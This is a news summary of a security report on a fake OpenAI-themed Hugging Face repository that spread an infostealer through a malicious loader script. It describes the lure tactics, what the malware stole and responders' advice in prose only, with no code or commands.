Fake OpenAI Hugging Face Repo Spread Infostealer to 244,000 Downloads
Updated
Updated · rescana.com · May 11
Fake OpenAI Hugging Face Repo Spread Infostealer to 244,000 Downloads
10 articles · Updated · rescana.com · May 11
Researchers found a fake OpenAI-themed Hugging Face repository used in a supply-chain attack that pushed a Rust-based infostealer before the project was removed.
The repository mimicked legitimate AI tools, used typosquatting, trending-list manipulation and SEO promotion, and inflated its own popularity with bots to lure developers and researchers.
A malicious loader.py disabled SSL checks, fetched remote instructions, launched PowerShell and batch scripts, then installed the final payload from attacker-controlled infrastructure.
The malware stole browser passwords, cookies, session tokens, Discord tokens, SSH and VPN credentials, crypto wallets, local keys and screenshots, while evading sandboxes and adding Defender exclusions.
The case highlights rising risk in public AI model registries, with responders urging affected users to reimage machines, rotate all credentials and monitor traffic to known command-and-control domains.
Are open-source AI platforms becoming the next major battleground for cyber warfare?
With AI models becoming black boxes, how can developers truly trust the code they download?
244,000 Downloads, 667 Fake Likes: Inside the Largest AI Supply Chain Attack on Hugging Face
Overview
A major AI supply chain attack was uncovered when a malicious repository called `Open-OSS/privacy-filter` appeared on the Hugging Face platform. This repository tricked users into downloading and running harmful scripts—'start.bat' for Windows or 'loader.py' for Linux and macOS—under the guise of setting up a legitimate AI model. Once executed, these scripts compromised users' systems. Hugging Face quickly confirmed the repository violated its terms and removed it, but the incident highlights how attackers can exploit trusted platforms and developer habits to spread malware through open-source AI projects.